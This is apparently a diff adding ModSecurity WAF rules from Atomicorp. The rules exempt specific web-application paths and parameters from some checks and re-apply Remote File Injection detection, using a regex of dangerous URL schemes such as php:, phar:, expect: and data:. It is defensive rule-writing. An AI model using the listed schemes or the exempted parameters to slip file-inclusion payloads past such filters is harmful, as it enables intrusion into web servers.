+SecRule REQUEST_FILENAME "/admin_config\.php" "phase:2,id:91238,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91239,t:none,pass,nolog,skipAfter:END_RULES_91239"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:pagename "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340663,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:pagename "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340664,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91239
+
+SecRule REQUEST_FILENAME "/cutenews/index\.php" "phase:2,id:91240,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91241,t:none,pass,nolog,skipAfter:END_RULES_91241"
+
+SecRule ARGS|!ARGS:/http_script_dir/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:change_avatar|!ARGS:short_story "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340665,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/http_script_dir/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:change_avatar|!ARGS:short_story "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340666,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91241
+
+SecRule REQUEST_FILENAME "/data/nanoadmin\.php" "phase:2,id:91242,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91243,t:none,pass,nolog,skipAfter:END_RULES_91243"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^areaContent/|!ARGS:content "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340667,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^areaContent/|!ARGS:content "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340668,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91243
+
+SecRule REQUEST_FILENAME "/auctions/rsstml\.php" "phase:2,id:91244,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91245,t:none,pass,nolog,skipAfter:END_RULES_91245"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:XML "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340669,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:XML "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "id:340670,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91245
+
+SecRule REQUEST_FILENAME "/install/util\.php" "phase:2,id:91246,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340157"
+
+SecRule REQUEST_FILENAME "/egroupware/index\.php" "phase:2,id:91247,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91248,t:none,pass,nolog,skipAfter:END_RULES_91248"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^newssettings/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340672,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^newssettings/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340673,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91248
+
+SecRule REQUEST_FILENAME "/lclaccounts/setup/config\.php" "phase:2,id:91249,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91250,t:none,pass,nolog,skipAfter:END_RULES_91250"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^newssettings/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:341672,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^newssettings/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:341673,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91250
+
+SecRule REQUEST_FILENAME "/admin/post_property\.php" "phase:2,id:91251,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91252,t:none,pass,nolog,skipAfter:END_RULES_91252"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:map|!ARGS:photo "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340674,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:map|!ARGS:photo "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340675,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecMarker END_RULES_91252
+
+SecRule REQUEST_FILENAME "/filemanager/browser/default/browser\.html" "phase:2,id:91253,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91254,t:none,pass,nolog,skipAfter:END_RULES_91254"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Connector "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340676,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:Connector "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340677,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91254
+
+SecRule REQUEST_FILENAME "/admin\.mvc" "phase:2,id:91255,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91256,t:none,pass,nolog,skipAfter:END_RULES_91256"
+
+SecRule ARGS|!ARGS:/description/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/CFM_Fields/|!ARGS:Store_MvUPS_Server|!ARGS:/^Store_CustomerEmail_/|!ARGS:Store_OUI_GlobalHeader|!ARGS:Store_OUI_GlobalFooter|!ARGS:Store_OUI_InvoiceFooter "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340678,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/description/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/CFM_Fields/|!ARGS:Store_MvUPS_Server|!ARGS:/^Store_CustomerEmail_/|!ARGS:Store_OUI_GlobalHeader|!ARGS:Store_OUI_GlobalFooter|!ARGS:Store_OUI_InvoiceFooter "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340679,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91256
+
+SecRule REQUEST_FILENAME "/delivery/ck\.php" "phase:2,id:91257,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91258,t:none,pass,nolog,skipAfter:END_RULES_91258"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:oaparam__bannerid|!ARGS:oaparams "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340680,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:oaparam__bannerid|!ARGS:oaparams "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340681,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91258
+
+SecRule REQUEST_FILENAME "/proxy/index\.php" "phase:2,id:91259,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91260,t:none,pass,nolog,skipAfter:END_RULES_91260"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:q "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340682,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:q "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340683,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91260
+
+SecRule REQUEST_FILENAME "^/imp/" "phase:2,id:91261,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91262,t:none,pass,nolog,skipAfter:END_RULES_91262"
+
+SecRule ARGS|!ARGS:DefaultZDM|!ARGS:/http/|!ARGS:/refer/|!ARGS:/redirect/|!ARGS:subject|!ARGS:imapuser|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:u|!ARGS:message|!ARGS:/msg/|!ARGS:formData|!ARGS:form_img "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340684,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:DefaultZDM|!ARGS:/http/|!ARGS:/refer/|!ARGS:/redirect/|!ARGS:subject|!ARGS:imapuser|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:u|!ARGS:message|!ARGS:/msg/|!ARGS:formData|!ARGS:form_img "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340685,rev:9,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91262
+
+SecRule REQUEST_FILENAME "modules/mod_wowstatus/wowserverstatus\.php" "phase:2,id:91263,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"
+
+SecRule REQUEST_FILENAME "/ucp\.php" "phase:2,id:91264,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91265,t:none,pass,nolog,skipAfter:END_RULES_91265"
+
+SecRule ARGS|!ARGS:/website/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/twitter/|!ARGS:/google/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:mode|!ARGS:message|!ARGS:remotelink|!ARGS:website|!ARGS:signature "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340686,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,deny,log,auditlog,status:403,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/website/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/twitter/|!ARGS:/google/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:mode|!ARGS:message|!ARGS:remotelink|!ARGS:website|!ARGS:signature "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,deny,log,auditlog,status:403,multimatch,id:340687,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91265
+
+SecRule REQUEST_FILENAME "/app-modernbill-admin/configs\.php" "phase:2,id:91266,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91267,t:none,pass,nolog,skipAfter:END_RULES_91267"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^configParams/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340690,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^configParams/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340691,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91267
+
+SecRule REQUEST_FILENAME "/sysadminarea\.php" "phase:2,id:91268,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91269,t:none,pass,nolog,skipAfter:END_RULES_91269"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^configParams/|!ARGS:/^update/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340692,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/^configParams/|!ARGS:/^update/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340693,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91269
+
+SecRule REQUEST_FILENAME "/download\.php" "phase:2,id:91270,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91271,t:none,pass,nolog,skipAfter:END_RULES_91271"
+
+SecRule ARGS|!ARGS:/link/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:file|!ARGS:referer "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340694,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/link/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:file|!ARGS:referer "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340695,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91271
+
+SecRule REQUEST_FILENAME "/net2ftp_installer\.php" "phase:2,id:91272,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91273,t:none,pass,nolog,skipAfter:END_RULES_91273"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:package "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340696,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:package "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340697,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91273
+
+SecRule REQUEST_FILENAME "/mediaplayer\.swf" "phase:2,id:91274,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
